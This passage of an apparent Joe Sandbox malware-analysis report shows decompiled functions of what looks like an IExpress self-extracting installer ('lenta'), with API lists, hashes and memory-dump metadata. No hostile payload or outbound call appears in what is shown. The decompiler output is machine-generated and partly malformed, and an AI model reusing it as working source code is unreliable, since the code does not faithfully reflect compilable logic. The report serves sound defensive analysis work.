                                                                                                                                                                                                                                                  • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,010E3100,00000000,00000000), ref: 010E3AF4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$LICENSE
                                                                                                                                                                                                                                                • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                                • Opcode ID: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                                                                                                                                                                                                                                                • Instruction ID: 603b7f084cb65ea5b26799051bcc7c3adbbeaf6b6fe203bf7cbd40dd1d3d5ede
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9115171705201AED7346B27AC0CE5B7EE9EBD9B50B00446EB5C6DF254DA7F88008764
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E24E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E24E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x10e8004; // 0x71a8563c
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E010E658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E010E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                                0x010e24e0
                                                                                                                                                                                                                                                0x010e24eb
                                                                                                                                                                                                                                                0x010e24f2
                                                                                                                                                                                                                                                0x010e24f7
                                                                                                                                                                                                                                                0x010e2504
                                                                                                                                                                                                                                                0x010e250e
                                                                                                                                                                                                                                                0x010e251d
                                                                                                                                                                                                                                                0x010e252c
                                                                                                                                                                                                                                                0x010e2541
                                                                                                                                                                                                                                                0x010e2546
                                                                                                                                                                                                                                                0x010e2553
                                                                                                                                                                                                                                                0x010e2555
                                                                                                                                                                                                                                                0x010e2555
                                                                                                                                                                                                                                                0x010e2546
                                                                                                                                                                                                                                                0x010e256c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010E2506
                                                                                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010E252C
                                                                                                                                                                                                                                                • _lopen.KERNEL32(?,00000040), ref: 010E253B
                                                                                                                                                                                                                                                • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010E254C
                                                                                                                                                                                                                                                • _lclose.KERNEL32(00000000), ref: 010E2555
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                                • String ID: wininit.ini
                                                                                                                                                                                                                                                • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                                • Opcode ID: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                                                                                                                                                                                                                                                • Instruction ID: 9034fc79c89149b6826f9f3278114a0c495d1395d270f6e36d586aadbc2af316
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF019632700118ABD7309A669D0CEDF7FFCDB95B60F000155FA85D7144DA794A418B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E36EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E36EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x10e8004; // 0x71a8563c
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x10e8184 = 1;
						 *0x10e8180 = 1;
						L13:
						 *0x10e9a40 = _t119;
						L14:
						__eflags =  *0x10e8a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x10e8a38 & 0x00000001;
											if(( *0x10e8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E010E681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E010E67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E010E28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x10e9a40 = _t119;
						 *0x10e8184 = 1;
						 *0x10e8180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x10e9a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x10e8184 = _t135;
							 *0x10e8180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E010E44B9(0, _t138);
					L66:
					return E010E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                                0x010e36f9
                                                                                                                                                                                                                                                0x010e3700
                                                                                                                                                                                                                                                0x010e370c
                                                                                                                                                                                                                                                0x010e3716
                                                                                                                                                                                                                                                0x010e3718
                                                                                                                                                                                                                                                0x010e371b
                                                                                                                                                                                                                                                0x010e3721
                                                                                                                                                                                                                                                0x010e372b
                                                                                                                                                                                                                                                0x010e373d
                                                                                                                                                                                                                                                0x010e3745
                                                                                                                                                                                                                                                0x010e3746
                                                                                                                                                                                                                                                0x010e3746
                                                                                                                                                                                                                                                0x010e3749
                                                                                                                                                                                                                                                0x010e37ab
                                                                                                                                                                                                                                                0x010e37ad
                                                                                                                                                                                                                                                0x010e37ae
                                                                                                                                                                                                                                                0x010e37b3
                                                                                                                                                                                                                                                0x010e37b8
                                                                                                                                                                                                                                                0x010e37b8
                                                                                                                                                                                                                                                0x010e37bf
                                                                                                                                                                                                                                                0x010e37bf
                                                                                                                                                                                                                                                0x010e37c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37cb
                                                                                                                                                                                                                                                0x010e37cd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37d5
                                                                                                                                                                                                                                                0x010e37db
                                                                                                                                                                                                                                                0x010e37e8
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37ea
                                                                                                                                                                                                                                                0x010e37f0
                                                                                                                                                                                                                                                0x010e37f6
                                                                                                                                                                                                                                                0x010e3805
                                                                                                                                                                                                                                                0x010e3817
                                                                                                                                                                                                                                                0x010e382b
                                                                                                                                                                                                                                                0x010e3830
                                                                                                                                                                                                                                                0x010e3836
                                                                                                                                                                                                                                                0x010e383b
                                                                                                                                                                                                                                                0x010e383d
                                                                                                                                                                                                                                                0x010e38eb
                                                                                                                                                                                                                                                0x010e38eb
                                                                                                                                                                                                                                                0x010e38f2
                                                                                                                                                                                                                                                0x010e390c
                                                                                                                                                                                                                                                0x010e3911
                                                                                                                                                                                                                                                0x010e3911
                                                                                                                                                                                                                                                0x010e3913
                                                                                                                                                                                                                                                0x010e394d
                                                                                                                                                                                                                                                0x010e394d
                                                                                                                                                                                                                                                0x010e394f
                                                                                                                                                                                                                                                0x010e38a9
                                                                                                                                                                                                                                                0x010e38a9
                                                                                                                                                                                                                                                0x010e38b0
                                                                                                                                                                                                                                                0x010e38b2
                                                                                                                                                                                                                                                0x010e38b9
                                                                                                                                                                                                                                                0x010e38bb
                                                                                                                                                                                                                                                0x010e38c1
                                                                                                                                                                                                                                                0x010e3975
                                                                                                                                                                                                                                                0x010e38c7
                                                                                                                                                                                                                                                0x010e38de
                                                                                                                                                                                                                                                0x010e38e0
                                                                                                                                                                                                                                                0x010e38e0
                                                                                                                                                                                                                                                0x010e397b
                                                                                                                                                                                                                                                0x010e397d
                                                                                                                                                                                                                                                0x010e39a9
                                                                                                                                                                                                                                                0x010e397f
                                                                                                                                                                                                                                                0x010e3982
                                                                                                                                                                                                                                                0x010e398b
                                                                                                                                                                                                                                                0x010e398d
                                                                                                                                                                                                                                                0x010e398f
                                                                                                                                                                                                                                                0x010e399f
                                                                                                                                                                                                                                                0x010e39a1
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e3991
                                                                                                                                                                                                                                                0x010e398f
                                                                                                                                                                                                                                                0x010e39af
                                                                                                                                                                                                                                                0x010e39b6
                                                                                                                                                                                                                                                0x010e3a0f
                                                                                                                                                                                                                                                0x010e3a0f
                                                                                                                                                                                                                                                0x010e3a11
                                                                                                                                                                                                                                                0x010e3a13
                                                                                                                                                                                                                                                0x010e3a19
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39b8
                                                                                                                                                                                                                                                0x010e39b8
                                                                                                                                                                                                                                                0x010e39ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39bc
                                                                                                                                                                                                                                                0x010e39bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39c3
                                                                                                                                                                                                                                                0x010e39c9
                                                                                                                                                                                                                                                0x010e39ce
                                                                                                                                                                                                                                                0x010e39d0
                                                                                                                                                                                                                                                0x010e39e3
                                                                                                                                                                                                                                                0x010e39e5
                                                                                                                                                                                                                                                0x010e39e6
                                                                                                                                                                                                                                                0x010e39f1
                                                                                                                                                                                                                                                0x010e39f7
                                                                                                                                                                                                                                                0x010e39fa
                                                                                                                                                                                                                                                0x010e3a01
                                                                                                                                                                                                                                                0x010e3a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3a06
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e3a0b
                                                                                                                                                                                                                                                0x010e3a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3a09
                                                                                                                                                                                                                                                0x010e39fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39fc
                                                                                                                                                                                                                                                0x010e39d3
                                                                                                                                                                                                                                                0x010e39d8
                                                                                                                                                                                                                                                0x010e39da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e39dc
                                                                                                                                                                                                                                                0x010e39b6
                                                                                                                                                                                                                                                0x010e3955
                                                                                                                                                                                                                                                0x010e395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3961
                                                                                                                                                                                                                                                0x010e3963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3969
                                                                                                                                                                                                                                                0x010e3969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3969
                                                                                                                                                                                                                                                0x010e3915
                                                                                                                                                                                                                                                0x010e3915
                                                                                                                                                                                                                                                0x010e391b
                                                                                                                                                                                                                                                0x010e391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e392d
                                                                                                                                                                                                                                                0x010e3933
                                                                                                                                                                                                                                                0x010e3938
                                                                                                                                                                                                                                                0x010e393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3940
                                                                                                                                                                                                                                                0x010e3946
                                                                                                                                                                                                                                                0x010e394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e38f2
                                                                                                                                                                                                                                                0x010e3843
                                                                                                                                                                                                                                                0x010e3845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e384b
                                                                                                                                                                                                                                                0x010e384d
                                                                                                                                                                                                                                                0x010e3883
                                                                                                                                                                                                                                                0x010e3885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e389a
                                                                                                                                                                                                                                                0x010e389e
                                                                                                                                                                                                                                                0x010e389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e38a0
                                                                                                                                                                                                                                                0x010e38a0
                                                                                                                                                                                                                                                0x010e38a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e38a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e38a4
                                                                                                                                                                                                                                                0x010e384f
                                                                                                                                                                                                                                                0x010e3851
                                                                                                                                                                                                                                                0x010e3857
                                                                                                                                                                                                                                                0x010e386e
                                                                                                                                                                                                                                                0x010e3877
                                                                                                                                                                                                                                                0x010e387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3881
                                                                                                                                                                                                                                                0x010e3859
                                                                                                                                                                                                                                                0x010e385c
                                                                                                                                                                                                                                                0x010e3862
                                                                                                                                                                                                                                                0x010e3866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e38f4
                                                                                                                                                                                                                                                0x010e38f4
                                                                                                                                                                                                                                                0x010e38f5
                                                                                                                                                                                                                                                0x010e38fb
                                                                                                                                                                                                                                                0x010e3901
                                                                                                                                                                                                                                                0x010e3901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e390a
                                                                                                                                                                                                                                                0x010e374b
                                                                                                                                                                                                                                                0x010e374e
                                                                                                                                                                                                                                                0x010e375c
                                                                                                                                                                                                                                                0x010e3764
                                                                                                                                                                                                                                                0x010e3769
                                                                                                                                                                                                                                                0x010e376e
                                                                                                                                                                                                                                                0x010e3771
                                                                                                                                                                                                                                                0x010e379c
                                                                                                                                                                                                                                                0x010e379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37a3
                                                                                                                                                                                                                                                0x010e37a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e37a4
                                                                                                                                                                                                                                                0x010e3773
                                                                                                                                                                                                                                                0x010e3777
                                                                                                                                                                                                                                                0x010e3778
                                                                                                                                                                                                                                                0x010e377f
                                                                                                                                                                                                                                                0x010e3781
                                                                                                                                                                                                                                                0x010e378e
                                                                                                                                                                                                                                                0x010e378e
                                                                                                                                                                                                                                                0x010e3794
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3794
                                                                                                                                                                                                                                                0x010e3783
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3785
                                                                                                                                                                                                                                                0x010e378c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e378c
                                                                                                                                                                                                                                                0x010e3750
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e372d
                                                                                                                                                                                                                                                0x010e372d
                                                                                                                                                                                                                                                0x010e396b
                                                                                                                                                                                                                                                0x010e396b
                                                                                                                                                                                                                                                0x010e396c
                                                                                                                                                                                                                                                0x010e396e
                                                                                                                                                                                                                                                0x010e396f
                                                                                                                                                                                                                                                0x010e3a1e
                                                                                                                                                                                                                                                0x010e3a1e
                                                                                                                                                                                                                                                0x010e3a22
                                                                                                                                                                                                                                                0x010e3a27
                                                                                                                                                                                                                                                0x010e3a3e
                                                                                                                                                                                                                                                0x010e3a3e

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010E3723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 010E39C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 010E39F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                                                                                                                                                                                                                                                • Instruction ID: b86db8c7c02e33c84da4193f86b6d672de55112a3b0a02a6e34a99d572567247
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7291B271E012159FEBB98A1BC9887EABFF5BB85704F0941EAC9C99F241D7358D80CB41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E010E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x10e8004; // 0x71a8563c
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E010E1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E010E658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E010E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                                0x010e6495
                                                                                                                                                                                                                                                0x010e6495
                                                                                                                                                                                                                                                0x010e64a0
                                                                                                                                                                                                                                                0x010e64a7
                                                                                                                                                                                                                                                0x010e64ab
                                                                                                                                                                                                                                                0x010e64bd
                                                                                                                                                                                                                                                0x010e64c2
                                                                                                                                                                                                                                                0x010e64d3
                                                                                                                                                                                                                                                0x010e64df
                                                                                                                                                                                                                                                0x010e64e8
                                                                                                                                                                                                                                                0x010e6502
                                                                                                                                                                                                                                                0x010e64ee
                                                                                                                                                                                                                                                0x010e64f9
                                                                                                                                                                                                                                                0x010e64f9
                                                                                                                                                                                                                                                0x010e6516

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E64DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E64F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 010E6502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
